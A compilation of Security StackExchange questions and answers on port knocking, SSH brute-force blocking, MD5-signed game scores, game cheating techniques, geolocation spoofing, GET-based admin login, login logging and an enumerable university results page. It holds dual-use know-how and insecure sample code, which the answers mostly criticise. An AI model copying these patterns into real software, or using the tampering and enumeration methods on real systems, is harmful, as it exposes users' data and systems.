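with open("photo.jpg", "rb") as f:
    digest = hashlib.sha256(f.read()).hexdigest()
print(digest)  # this short string is what a timestamping authority would attest to | {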
"source": [
"https://security.stackexchange.com/questions/146806",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134800/"
]
} |
146,837 | Would it be possible to appear as though a server doesn't exist? Is it possible to have all requests believe the host-name could not be resolved unless a specific phrase was provided in the request? Is there some evidence of a server's existence that could not be hidden by the owner of the server? Would there be any practical added security? | You can set your server to normally drop all incoming packets and only open a port after it gets/sees a set of packets that specify a specific sequence of ports (this is called port knocking). I use this technique with my server; you cannot normally see the server because it drops all incoming packets. Once the port knocking packets reach the server, the server will then accept packets from the 'knocking' address but continue to drop packets from other addresses. Security is better with this method because IP scans and brute-force attempts won't be much of an issue to you. In order to hack a server there must be recon, to find out what services are running, what kind of OS you have, etc. By denying an attacker this info, it makes it harder for him to craft his attack for your device. The weakness of this defense is that if an attacker can see the incoming knocking packets, they can then open that port as well.
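To make that concrete, a hedged sketch of a knock client (Python standard library; the address and the 7000/8000/9000 sequence are invented examples, and the matching firewall rules would normally be managed by a daemon such as knockd): import socket, time
KNOCK = [7000, 8000, 9000]  # hypothetical secret port sequence
for port in KNOCK:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)
    try:
        s.connect(("203.0.113.10", port))  # the SYN is silently dropped; the attempt itself is the knock
    except OSError:
        pass  # timeouts/refusals are expected and harmless
    finally:
        s.close()
    time.sleep(0.2)
# after a correct sequence the server starts accepting this source address, e.g. on port 22 | {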
"source": [
"https://security.stackexchange.com/questions/146837",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
146,899 | I logged onto my VPS this morning to find millions of failed login attempts for the root user and other users that don't even exist. I took the below measures to try and obfuscate the attacker's efforts (which have been going on for months). Question(s) Is this an appropriate response? What more can be done? Is there anything valuable I can do with a list of these IPs? System info for a Centos7 vps uname -a
Linux vm01 3.10.0-327.22.2.el7.x86_64 #1 SMP Thu Jun 23 17:05:11 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux step 1 Created a script to grab all the IP addresses that failed to log in from the secure log. ( /var/log/secure ) # get_ips.sh
grep "Failed password for" /var/log/secure \
| grep -Po "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" \
| sort \
| uniq -c step 2 Write a script to create firewall rules to block the ip address that are found from the script in step 1. This script is ip_list_to_rules.sh #!/bin/bash
# ip_list_to_rules.sh
# script to parse output of get_ips.sh and create firewall rules
# to block ssh requests
if [ -z $1 ]; then
echo "arg1 must be path to a list of the form <COUNT> <IP>\n"
exit
fi
LIST=$(readlink -f $1)
SSH_IP=$(echo $SSH_CLIENT | head -n1 | awk '{print $1;}')
echo "Reading IPs from ${LIST}"
echo "SSH Client IP will be ignored (${SSH_IP})"
while read COUNT IP; do
echo "Creating rule for ${IP}"
firewall-cmd --direct --add-rule ipv4 filter INPUT 1 -m tcp --source $IP -p tcp --dport 22 -j REJECT
firewall-cmd --direct --add-rule ipv4 filter INPUT 1 -m tcp --source $IP/24 -p tcp --dport 22 -j REJECT
done<<<"$(cat ${LIST} | grep -v ${SSH_IP})" step 3 Run it all and save rules. ./get_ips.sh > attack_ips.list
./ip_list_to_rules.sh attack_ips.list
firewall-cmd --reload Update Below are the measures I took from the answers. Disabled root logins Changed SSH port Installed & configured fail2ban Disabled password authentication & enabled public key auth I didn't actually do 4 because I usually connect through chrome secure shell client and AFAIK there isn't public key support. | Yes, this is a perfectly reasonable and common approach. However, you've reinvented fail2ban . You probably want to switch to using that instead so you don't have to debug issues with your script and can make use of the existing filters for ssh, apache, and other common services. Unfortunately, there is not terribly much you can do with these IPs. You can try to report the activity to the abuse contact listed for their IP block, but it's not really worth your time unless they do something more serious. You should also do the standard ssh hardening, like disabling password-based and root logins unless you absolutely need them. | {
"source": [
"https://security.stackexchange.com/questions/146899",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134886/"
]
} |
147,043 | TL;DR I am working on a gaming system that uses UnityScript and C# on the client and PHP on the server. A MD5 hash of the data plus a shared secret is used to check that the data has not been modified in transit. Is MD5 good enough for this? What other hash algorithm could I use that works in all three languages? The Problem In More Detail I have come across some code on a widely used community website about the popular Game Development Platform Unity , and I am now working on improving the MySQL, PHP and security of that code. The code uses a "secret key" value that is shared between the client and the server. All messages from the client includes a hash of the data (e.g. name and score) plus the secret key, that the server checks before accepting the data. This is basically an authentication that the data passed has not been tampered with. However, because it's MD5 I think someone who is listening to the network traffic could easily work out the secret key and then post whatever data they want to the server. So my questions are: Does this current state of affairs warrent improvement? Or is this the intended current use of MD5 (as of January 2017)? Is there another hashing algorithm that could further improve/authenticate this communication activity? Please note that the algorithm would need to work in PHP, UnityScript and C#. The Code In UnityScript (client side): var hash=Md5.Md5Sum(name + score + secretKey); In C# (client side): string hash = MD5Test.Md5Sum(name + score + secretKey); In PHP (server side): $secretKey = "mySecretKey"; // Change this value to match the value
//stored in the client javascript below
$realHash = md5($_GET['name'] . $_GET['score'] . $secretKey);
if($realHash == $hash) { // $hash stands for the hash value received from the client, e.g. $_GET['hash']
//interact with database
} Further Criteria Some Unity programmers use UnityScript (a Python-like language with a JavaScript-like syntax on the .NET API) but no library can be assumed to be installed. Game Developers are not PHP / MySQL programmers so complex or 3rd party PHP/C#/Js code would probably not be helpful. BCrypt is apparently unwise to use with C# BCrypt needs a static salt in this instance (perhaps derived from the secret key?) but is intended to work with a random salt. PBKDF2 seems to be prefered over BCrypt but can be very slow particularly on mobile devices without much memory. Dealing with a secured server can not be expected (if only...). I don't know enough about the C# security library to really pick out best options from those listed. While the code outlined is simply to do with highscore updates, this code has been in the past - and will be in the future - taken and used for transporting all sorts of data, public and private to various databases. Dealing with hash algorithm interoperability between PHP, UnityScript, C# is a bigger hurdle than I had anticipated. If it was just PHP I'd use password_hash . Some Thoughts and background to this question: I updated the title as the edited title seemed to suggest that I wasn't sure about changing MD5, whereas knowing I should change MD5 was one of the core reasons of asking the question here in the first place. The original question was that I wanted to update the terrible code suggestions given on (amongst other places) here about how to handle interactions between a game on a client machine and data storage on a remote server. Bare in mind this is code suggestions for beginner programmers in Unity and this site is [now] run by Unity Technologies themselves. If you look, the original question (linked above) was using PHP Mysql_ functions (as well as a rather crappy invalid form of PDO). I felt this would benefit from a rewrite. I saw that the original code had also used an md5 routine to hash the intended data. When it came to the replacement of MD5, I hadn't realised either the vulnerability of compiled project files or the size/scale of the work needed to make this codeblock be actually more secure (on either the interaction with the server or the client side data).
My original quest was to find a suitable drop-in replacement for the MD5 which could work in the various languages required (UnityScript, C#, PHP), as I was aware of its shortfalls. I hadn't realised (judging by the comments here) how tediously easy it actually is to break into exe's and grab hardcoded data. This question is NOT about a game I'm making, it is not about My project and the code quoted that I am intending to replace was not written by me . I read a lot of the comments that somehow people are having a go at the messenger, but this question came from my own wish to improve an existing shortcoming on a teaching wiki website.
I do have the greatest respect for the knowledge shared in answering this question but I am aware that from the last 6 months exploring the Unity documentation and learning sites that there is a significant gap in securing both local applications and multiplayer or other remote interactions. I see a lot of responders in comments stating that the answer given by George is a bad answer - but it answers the specific question I asked, at the time.
Thanks. Final Note: This blog post from comments by Luke Briggs underlined how much of an eye-openingly easy process it is to manipulate local Unity Game Application data. I did not at all comprehend how vulnerable local files are.... | This approach is fundamentally flawed. Anything on the client side can and will be tampered with by players. It is the same problem which makes DRM untenable - the user owns the machine and all the data on it, including your executables, data in memory, etc. Keeping algorithms secret doesn't work (see Kerckhoffs's principle ) because it only takes a small amount of reverse engineering work to work out what your code is doing. For example, let's say you've got a routine in your game client which posts the level score up to the server, using some cryptography of whatever form to ensure that it isn't tampered with over the network. There are a whole bunch of ways to get around this: Use a memory editing tool such as Cheat Engine to scan for the current score (pause, search the score, unpause, wait for score to change, search again, repeat until you find the memory address which contains the value) and edit it. When the level completes the score value will be happily treated as legitimate by your code, and uploaded to the server. Modify the game executable on disk so that your "level complete" code ignores the real score value and picks a different one. Modify the game executable on disk so that simple things (e.g. killing one monster) increase your score by 1000x more than they should do. Modify the game executable on disk so that you can never die, or have infinite powerups, or one-hit kills, or any other number of helping things, so that you can easily attain a very high score. Perform any of those modifications in-memory after the game loads so that the original executable stays intact (useful for cases where there are annoying integrity checks). Simply expose the "we finished a level, now upload the score" code externally from the process so that it can be called by anyone's program. In native code you can inject a small stub and add an entry to the export table, or just directly copy the code into your own executable. In .NET it's trivial to just modify the class and method's visibility flags and import it into a new program. Now you can submit whatever score values you like without ever even running the game. Reverse engineer the game and get hold of the "secret" key and write your own app to send the score value to the server. This is just the tip of the iceberg. For more complex games there are all sorts of workarounds to anti-cheat and other problems, but regardless of the defense tricks used there will always be a way to mess with client-side values. The critical feature of a secure approach is that nothing on the player's computer should be trusted . When your server code receives a packet from a player, assume that your game might not even be running - it could be a totally homebrew piece of code that lies about everything. Securing multiplayer games (or any kind of game where verifying game state is a requirement) isn't easy. The problem isn't really even a security one, it's a usability and performance one. The simplest way to secure a multiplayer game is to keep the entire game state on the server side, have all the game logic executed and maintained there, and have the client do nothing but send player input over to the server ("user clicked the mouse, user is holding W key") and present the audio and video back to the player.
The problem with doing this is that it doesn't make for a very fun game due to network latency, and it's quite hard to scale on the server side. Instead, you have to find a balance between keeping things client-side and server-side. For example, the logic for "does the player have a key to open this door?" must be checked server side, but the logic of when to show the context icon for "open door" stays on the client side. Again, things like enemy health and position must be kept on the server side, and the player's ability to deal damage to that enemy must also be verified (is it near enough?) which means that AI can't be kept client-side, but things like the choice of which idle animation the enemy is displaying will probably be a client-side thing. We have a few questions on here about game security, so I suggest reading through those: Preventing artificial latency or "Lag Hacking" in multiplayer games Secure Software: How to ensure caller is authentic? Securely sending packets without them being spoofed Checking a locally stored string for tamper I also recommend these questions over at GameDev SE: How can a web game store points online without giving the user the possibility to do the same call but with more points? (almost literally your question) What are some ways to prevent or reduce cheating in online multiplayer games? How should multiplayer games handle authentication? There's also a great paper on multiplayer security from BlackHat EU 2013, and an article on non-authoritative P2P networking , which may both be of use. | {
"source": [
"https://security.stackexchange.com/questions/147043",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/82333/"
]
} |
147,057 | Given a website with various security flaws, one of them is session hijacking, session token continuously being sent as an argument over unsecured HTTP. In my field it's not surprising that others sniff networks I use, so I contacted the owner of this site and notified them of the vulnerabilities and suggested that they should use TLS encryption. Some arrogant guy replied that they know it better and it's not my business anyways. Since it's not always possible for me to use VPN when I access this site, my question as a regular user is, are there other reliable ways to defend against people stealing my session? | Here are some suggestions. None of this will give you the same level of security as TLS would, though. Don't use the site unless you really have to. But since you ask, I assume you do. If you visit it, use a VPN (or Tor) as often as possible. An attacker would have to get in the middle of your VPN exit and the server in question, which is harder than getting in the middle of you and the server (but not impossible, especially not for a government - or the provider of the VPN/Tor exit node...). If you don't use a VPN, at least don't use it over Wi-Fi. That is so much easier to sniff than a cable network. Stay logged in for as short periods of time as possible, and always log out when you are done. Don't check the "remember me" box. Unless the login page is over HTTPS, you should be more worried about your password than your session ID... If the login page is over HTTPS, always check that you have a secure connection so you don't become a victim of SSL-strip. Depending on how likely you think it is that you will be the target of an attack this may or may not be enough. I am afraid there is not much else you can do. | {
"source": [
"https://security.stackexchange.com/questions/147057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52758/"
]
} |
147,077 | I am using this Cordova plugin to implement SSL pinning in an Android application. I don't know how to simulate the environment for testing if it's working fine. The infosec team in my firm is telling me that if the connection is proxied (no other attacking thing), then the application will be getting another certificate from the proxy server and the app should alert about this. But the above plugin tells me that the connection is secure even on proxied connections. | Here are some suggestions. None of this will give you the same level of security as TLS would, though. Don't use the site unless you really have to. But since you ask, I assume you do. If you visit it, use a VPN (or Tor) as often as possible. An attacker would have to get in the middle of your VPN exit and the server in question, which is harder than getting in the middle of you and the server (but not impossible, especially not for a government - or the provider of the VPN/Tor exit node...). If you don't use a VPN, at least don't use it over Wi-Fi. That is so much easier to sniff than a cable network. Stay logged in for as short periods of time as possible, and always log out when you are done. Don't check the "remember me" box. Unless the login page is over HTTPS, you should be more worried about your password than your session ID... If the login page is over HTTPS, always check that you have a secure connection so you don't become a victim of SSL-strip. Depending on how likely you think it is that you will be the target of an attack this may or may not be enough. I am afraid there is not much else you can do. | {
"source": [
"https://security.stackexchange.com/questions/147077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50336/"
]
} |
147,111 | Looking at the count of CVE reports by product , I'm tempted to use it as an indicator of which programs are the most secure, and choose the ones I install accordingly. But I wonder if these numbers are misleading. For example, the Linux kernel is second in the list and Windows 10 is not even mentioned. I suppose it's in part because of the open source nature of Linux, which makes finding and fixing the flaws easier and faster, increasing the number of CVEs. Another thing that I find interesting is that, while Chrome has more vulnerabilities listed in 2016 than Firefox, there are a lot more code execution flaws in Firefox, while a big part of Chrome's flaws are DoS attacks, which are way less severe. Can we say that a software is "more secure" than another, based on the number of CVEs these softwares have ? | Can we say that a software is "more secure" than another, based on the number of CVEs these softwares have? No. CVE entries are not a good source to rank products by their "overall security". The main idea behind the CVE system is to create unique identifiers for software vulnerabilities. It's not designed to be a complete and verified database of all known vulnerabilities in any product. That is, a vendor or researcher could simply decide to not request a CVE number for a given flaw. Further, entries sometimes combine related bugs under a single ID or don't disclose the exact impact, making a simple "bug count" a rather meaningless security criterion. Also, for a ranking you'd have to find sensible metrics to compare different severities. (How many DoS bugs equal a remote code execution...?) That said, CVEs do surely give you an idea about what kind of vulnerabilities have been found in a product and they're a good starting point for research. But the amount strongly depends on the age of the software and how much attention it receives through security auditing. You can't really reason if a lot of CVE assignments means that the software is poorly written or if it actually means that it's particularly secure because evidently a lot of vulnerabilities are getting fixed. I personally tend to find it suspicious if an older product has a very short record of patched vulnerabilities because that could indicate it hasn't been audited thoroughly. So you should think of CVE as a dictionary rather than a database that simply assigns handles to vulnerabilities so that you can reference them easier — don't use it as a tool to compare security. Here are some better indicators for a secure product: The software is used and developed actively. The vendor encourages people to search for vulnerabilities (and maybe even offers bounties). New security bugs are processed and patched quickly. | {
"source": [
"https://security.stackexchange.com/questions/147111",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83600/"
]
} |
147,144 | A CNN article on the recent US Election hacks claims that ...the administration has traced the hack to the specific keyboards -- which featured Cyrillic characters -- that were used to construct the malware code, adding that the equipment leaves "digital fingerprints" and, in the case of the recent hacks, those prints point to the Russian government. Now to me that sounds like total baloney. You're going to trace a character, which may be in some executable code, back to a specific keyboard? And you're going to know that it's one particular model that is physically in one particular location? Is this nonsense or is there something I'm missing here? Wouldn't it also be trivial to spoof whatever is the source of this info? | A keyboard is not a typewriter. Keyboards produce scancodes that are interpreted by the software and mapped depending on your layout. When a key press produces a letter on your screen it's nothing more than the character value in its respective charset - keyboards don't leave "digital fingerprints" that could be traced back. Instead, the author probably meant to say that they found strings or identifiers with Cyrillic letters in the source code. But such traces are easy to fake and wouldn't count as "hard evidence"; even metadata could have been planted. Here's a similar case: After the Operation Aurora cyber attacks, analysts claimed they had found "Chinese source code" from which they concluded that the attack was led from China: HBGary, a security firm, recently released a report in which they claim to have found some significant markers that might help identify the code developer. The firm also said that the code was Chinese language based but could not be specifically tied to any government entity. Here, the case was actually stronger than the Cyrillic keyboard evidence as researchers could trace back parts of the code to a reference implementation that was only released in a Chinese paper: Perhaps the most interesting aspect of this source code sample is that it is of Chinese origin, released as part of a Chinese-language paper on optimizing CRC algorithms for use in microcontrollers. [...] This CRC-16 implementation seems to be virtually unknown outside of China (Source) | {
"source": [
"https://security.stackexchange.com/questions/147144",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/49767/"
]
} |
147,166 | Google and many other sites know my correct location. How can I fake my location without using a VPN, proxy, Tor or similar? I went to about:config and looked for geo. What I think I have to modify is geo.wifi.uri ? Maybe we can put in false latitude and longitude values directly? If so, how would it look then? I really have no idea about the format. Or is there another way using JavaScript in Greasemonkey? | Faking the Geolocation You can spoof the location provided via the HTML5 Geolocation API this way: Go to about:config . Type in geo.provider.network.url (or geo.wifi.uri in older versions) Change the value to something like this: data:application/json,{"location": {"lat": 40.7590, "lng": -73.9845}, "accuracy": 27000.0} (The lat and lng values determine the latitude and longitude of your location.) Confirm that geo.enabled is true . You may also need to set geo.provider.testing to true . (Create the key if it doesn't exist.) Congratulations, you're now on Times Square! (Verify the result here .) Note: This does not stop websites from deriving the location from your IP address. You can't do that on the application layer and would have to go with a proxy instead. Disabling the Geolocation For privacy reasons, you may want to prevent use of the API entirely: Go to about:config and set geo.enabled to false . Some technical details The Geolocation service in Firefox is set up in dom/geolocation/Geolocation.cpp . Following nsGeolocationService::Init() you see that without geo.enabled , the API initialization is aborted right away: if (!StaticPrefs::geo_enabled()) {
return NS_ERROR_FAILURE;
} Further, the browser chooses between different location providers based on your platform and settings. As you see, there are prefs to switch them individually (e.g., if you're on MacOS, you can set geo.provider.use_corelocation to false to disable geolocating via Apple's Core Location API ): #ifdef MOZ_WIDGET_ANDROID
mProvider = new AndroidLocationProvider();
#endif
#ifdef MOZ_WIDGET_GTK
# ifdef MOZ_GPSD
if (Preferences::GetBool("geo.provider.use_gpsd", false)) {
mProvider = new GpsdLocationProvider();
}
# endif
#endif
#ifdef MOZ_WIDGET_COCOA
if (Preferences::GetBool("geo.provider.use_corelocation", true)) {
mProvider = new CoreLocationLocationProvider();
}
#endif
#ifdef XP_WIN
if (Preferences::GetBool("geo.provider.ms-windows-location", false) &&
IsWin8OrLater()) {
mProvider = new WindowsLocationProvider();
}
#endif
if (Preferences::GetBool("geo.provider.use_mls", false)) {
mProvider = do_CreateInstance("@mozilla.org/geolocation/mls-provider;1");
} Only if none of the platform-specific providers apply, or if geo.provider.testing is true , Firefox defaults to the network (URL-based) provider: if (!mProvider || Preferences::GetBool("geo.provider.testing", false)) {
nsCOMPtr<nsIGeolocationProvider> geoTestProvider =
do_GetService(NS_GEOLOCATION_PROVIDER_CONTRACTID);
if (geoTestProvider) {
mProvider = geoTestProvider;
}
} The network provider ( dom/system/NetworkGeolocationProvider.jsm ) then requests the URL specified in geo.provider.network.url . You could set up your own mock HTTP location service and enter its URL here. But more easily, as in the steps at the top, it's sufficient to use a data: pseudo URI to mimic a network provider that unconditionally responds with your desired location details.
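If you'd rather run a real mock service than use the data: URI, a minimal sketch with Python's standard library (port and coordinates are arbitrary; you would point geo.provider.network.url at http://127.0.0.1:8808/): import json
from http.server import BaseHTTPRequestHandler, HTTPServer

class MockLocation(BaseHTTPRequestHandler):
    def do_POST(self):  # the provider URL is requested with a POST of wifi/cell scan data
        body = json.dumps({"location": {"lat": 40.7590, "lng": -73.9845},
                           "accuracy": 100.0}).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)  # always answer with the spoofed coordinates

HTTPServer(("127.0.0.1", 8808), MockLocation).serve_forever() | {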
"source": [
"https://security.stackexchange.com/questions/147166",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126235/"
]
} |
147,188 | I work on web applications and as you know, having an administrator panel is a must in most cases. We can see that a lot of web applications have a specific login page for administrators in which there is a form (usually POST method) that admins can use to log in to their panel. But because the field names are known, a hacker can attempt to crack the passwords even if some security methods are implemented. So what is the problem with a simple GET key (as username) and its value (as password)? Why is it not used a lot or at least, not suggested in many articles? For administrators, user-friendly login pages are not really needed! Data will be logged in both cases ( GET / POST ) if there is a MiTM attacker. But using this method, fields will be unknown except for admins themselves.
Here is a sample PHP code: "category.php": (A meaningless page name) <?php
if (isset($_GET['meaningless_user']) && $_GET['meaningless_user'] == "something"){ // the secret key name acts as the username, its value as the password
session_start();
$_SESSION["user"] = "test";
header('Location: category.php'); // Redirect to same or other page so GET parameters will disappear from the url
} else {
die(); // So it'll be like a blank page
}
?> | This would store the login link with password and username in the browser's history. It could also accidentally be captured by things like firewall logs, which wouldn't capture POST variables. | {
"source": [
"https://security.stackexchange.com/questions/147188",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42412/"
]
} |
147,216 | I'm working on a website — right now it's in early stages of testing, not yet launched and just has test data - thank goodness. First of all, a hacker figured out the password to log onto the website's 'administration' pages * . I think they used a key logger on a friend's computer who logged into the site to give me feedback. Secondly, they used a picture upload box to upload a PHP file. I have put in strict checking so that only .jpg and .png files are accepted — everything else should have been rejected. Surely there is no way to upload a .jpg file and then change the extension once the file is stored? Thankfully I also generate new file names when a file is sent to me, so I don't think they were able to locate the file to execute the code. I just can't seem to figure out how the website let a PHP file through. What's wrong with my security? The validation function code is below: function ValidateChange_Logo(theForm)
{
var regexp;
if (theForm.FileUpload1.value == "")
{
alert("You have not chosen a new logo file, or your file is not supported.");
theForm.FileUpload1.focus();
return false;
}
var extension = theForm.FileUpload1.value.substr(theForm.FileUpload1.value.lastIndexOf('.'));
if ((extension.toLowerCase() != ".jpg") &&
(extension.toLowerCase() != ".png"))
{
alert("You have not chosen a new logo file, or your file is not supported.");
theForm.FileUpload1.focus();
return false;
}
return true;
} Once the file gets to the server, I use the following code to retain the extension, and generate a new random name. It is a bit messy, but it works well. // Process and Retain File Extension
$fileExt = $_FILES[logo][name];
$reversed = strrev($fileExt);
$extension0 = substr($reversed, 0, 1);
$extension1 = substr($reversed, 1, 1);
$extension2 = substr($reversed, 2, 1);
$fileExtension = ".".$extension2.$extension1.$extension0;
$newName = rand(1000000, 9999999) . $fileExtension; I've just tested with a name such as logo.php;.jpg and although the picture cannot be opened by the website, it correctly changed the name to 123456.jpg . As for logo.php/.jpg , Windows doesn't allow such a file name. | Client side validation The validation code you have provided is in JavaScript. That suggests it is code that you use to do the validation on the client. Rule number one of securing webapps is to never trust the client . The client is under the full control of the user - or in this case, the attacker. You can not be sure that any code you send to the client is used for anything, and no blocks you put in place on the client have any security value whatsoever. Validation on the client is just for providing a smooth user experience, not to actually enforce any security relevant constraints. An attacker could just change that piece of JavaScript in their browser, or turn scripts off completely, or just not send the file from a browser but instead craft their own POST request with a tool like curl. You need to revalidate everything on the server. That means that your PHP must check that the files are of the right type, something your current code doesn't. How to do that is a broad issue that I think is outside the scope of your question, but these questions are good places to start reading. You might want to take a look at your .htaccess files as well. Getting the extension Not a security issue maybe, but this is a better way to do it: $ext = pathinfo($filename, PATHINFO_EXTENSION); Magic PHP functions When I store data from edit boxes, I use all three of PHP's functions to clean it: $cleanedName = strip_tags($_POST[name]); // Remove HTML tags
$cleanedName = htmlspecialchars($cleanedName); // Allow special chars, but store them safely.
$cleanedName = mysqli_real_escape_string($connectionName, $cleanedName); This is not a good strategy. The fact that you mention this in the context of validating file extensions makes me worried that you are just throwing a couple of security related functions at your input hoping it will solve the problem. For instance, you should be using prepared statements and not escaping to protect against SQLi. Escaping of HTML tags and special characters to prevent XSS needs to be done after the data is retrieved from the database, and how to do it depends on where you insert that data. And so on, and so on. Conclusion I am not saying this to be mean, but you seem to be making a lot of mistakes here. I would not be surprised if there are other vulnerabilities. If your app handles any sensitive information I would highly recommend that you let someone with security experience have a look at it before you take it into production.
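As a sketch of what "revalidate on the server" can look like, shown in Python for brevity (a PHP equivalent would combine pathinfo() with a content check such as finfo_file(); all names here are placeholders): import os, secrets, imghdr  # imghdr inspects the file contents, not the claimed name

ALLOWED = {"jpeg": ".jpg", "png": ".png"}

def store_upload(tmp_path, upload_dir):
    kind = imghdr.what(tmp_path)  # sniff the magic bytes of the uploaded file
    if kind not in ALLOWED:
        raise ValueError("not a JPEG or PNG")  # reject everything else, whatever its name claims
    new_name = secrets.token_hex(8) + ALLOWED[kind]  # server-chosen random name and extension
    os.rename(tmp_path, os.path.join(upload_dir, new_name))
    return new_name | {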
"source": [
"https://security.stackexchange.com/questions/147216",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135185/"
]
} |
147,222 | I am sorry for my lack of knowledge in this matter. My university (basically an international university in the UK that has students from different countries) has a website which requires the students to login before they can access their examination results. These results also include their Name and Address. But by inspecting the network transaction, I found out that it went to a page that directly takes student registration number in the URL and displays the examination result related to that. This page can be accessed without logging in to the student account and without any hassle, it gave me the examination result that exposed the student name and address. I tried multiple registration numbers similar to mine and all were processed easily. Another problem is that these registration numbers are in fixed length, only contain numbers and are in ascending order. So for example if a valid registration number is 000001 then the next one would be 000002 and so on. So in my opinion an attacker can easily create an automated program that could generate these registration numbers, randomly or in order, and get the names and addresses of hundreds of students. My questions are: Is it universally approved practice for universities to expose the names and addresses of students? Is it universally approved practice for universities that strong security related to name and address is not important? Is it a severe attack and do I have to report it to them? Or can it simply be ignored? Update: I received the reply from the university and they have now fixed it. Thanks to all of you. | I am sorry for my lack of knowledge in this matter. You shouldn't be. Is it universally approved practice for universities to expose the name and addresses of students? As pointed out in comments, it depends on your local laws and regulations. You should certainly check it once. But the way you describe the application(changing the URL to get the details, including the result), it sounds like a bug, which should certainly be reported. Is it universally approved practice for universities that strong security related to name and address is not important? No, be it a university or a big MNC or a small enterprise, or your own personal account, security is ALWAYS important. Is it a severe attack and do I have to report it to them? Or it can be simply ignored? Yes, you have to report it to the university, as soon as possible. It should not be ignored. EDIT: As pointed out in comments, there are some universities which do allow students' addresses to be made public. | {
"source": [
"https://security.stackexchange.com/questions/147222",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135190/"
]
} |
147,255 | Should failed login attempts be logged? My doubt is that if there is a distributed brute force attack, it might exhaust the available disk space of the database. What is the best practice for this? I'm protecting a public-facing web server with sensitive data. Based on the answers so far, one other question that occurred to me is whether web server logs would be enough for logging such attempts. Would it be redundant to log them in the database? | Yes, failed login attempts should be logged:
- You want to know when people are trying to get in
- You want to understand why your accounts are getting locked out
It's also very important - older Windows logging practice never emphasized this enough - to log successful login attempts as well, because if you have a string of failed login attempts, you really, really, really should know whether the last one was followed by a successful login. Logs are relatively small. If there were enough login attempts that logging would cause a problem, then "not knowing about the attempts" is probably a worse problem than "found out about them when we ran out of disk." A quick caveat - as @Polynomial points out, the password should not be logged (I seem to recall that 25 years ago some systems still did that). However, you also need to be aware that some legitimate login attempts will fail when people enter their password into the username field, so passwords do get logged anyway. Doubt me? Trawl your logs for Windows Event ID 4768:
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4768
EventType=0
Type=Information
ComputerName=dc.test.int
TaskCategory=Kerberos Authentication Service
OpCode=Info
RecordNumber=1175382241
Keywords=Audit Failure
Message=A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: gowenfawr-has-a-cool-password
Supplied Realm Name: TEST.INT
User ID: NULL SID
Correspondingly, you should limit access to these logs to the necessary people - don't just dump them into a SIEM that the whole company has read access to. Update to address question edit: Based on the answers so far, one other question that occurred to me is
whether web server logs would be enough for logging such attempts.
Would it be redundant to log them in the database? Best practice is that logs should be forwarded to a separate log aggregator in any case - for example, consider PCI DSS 10.5.4. In practice, such an aggregator is usually a SIEM, and it functions like a database rather than flat log files. So, yes, it's "redundant" by definition, but it's the kind of redundancy that's a security feature, not an architectural mistake. The advantages of logging to a database include searching, correlation, and summation. For example, the following Splunk search:
source="/var/log/secure" | regex _raw="authentication failure;" | stats count by user,host
will allow us to roll up authentication failures by user and host. Note that the ability to query discrete fields like 'user' and 'host' is dependent upon the SIEM picking logs apart and understanding what means what. The accessibility of those fields here is a side effect of Splunk automagically parsing the logs for me. Given that your original question dealt with space constraints, it should be pointed out that any database or SIEM solution is going to take more disk space than flat text file logs. However, if you use such a solution, you'll almost always put it on a separate server for security and space management reasons. (There are even SIEM-in-the-cloud solutions now to make life easier for you!)
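If you don't have a SIEM, the same roll-up can be approximated with a few lines of script. A rough sketch (Python, assuming pam_unix-style failure lines with rhost= and user= fields; adjust the patterns to your distribution's log format):
from collections import Counter
import re

counts = Counter()
with open("/var/log/secure") as log:          # /var/log/auth.log on Debian/Ubuntu
    for line in log:
        if "authentication failure" not in line:
            continue
        user = re.search(r"user=(\S+)", line)
        host = re.search(r"rhost=(\S+)", line)
        counts[(user.group(1) if user else "?",
                host.group(1) if host else "?")] += 1

for (user, host), n in counts.most_common(20):
    print(f"{n:6d}  user={user:<16} rhost={host}")
This is no substitute for a real aggregator, but it shows why structured fields matter. | {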
"source": [
"https://security.stackexchange.com/questions/147255",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/118278/"
]
} |
147,447 | When I run gpg --verify ~/file.asc ~/file I receive the following: gpg: Signature made Tue 10 Dec 2016 05:10:10 AM EST using RSA key ID abcdefgh
gpg: Good signature from "Alias (signing key) <[email protected]>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: (a fingerprint)
Subkey fingerprint: (a fingerprint)
The primary fingerprint matches the output of gpg --fingerprint. In my keyring I have:
pub 4096R/abcdefgh 2014-12-12 [expires: 2020-08-02]
Key fingerprint = (A public finger print)
uid Alias (signing key) <[email protected]>
sub 4096R/xcdertyu 2014-12-11 [expires: 2017-08-11]
I wanted to verify the authenticity of a file with the public key fingerprint. Note that the trust level is level 4 (full trust). I believe this because:
:~$ gpg --edit-key abcdefgh
gpg (GnuPG) 1.4.18; Copyright (C) 2014 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub 4096R/abcdefgh created: 2014-12-12 expires: 2020-08-02 usage: C
trust: full validity: unknown
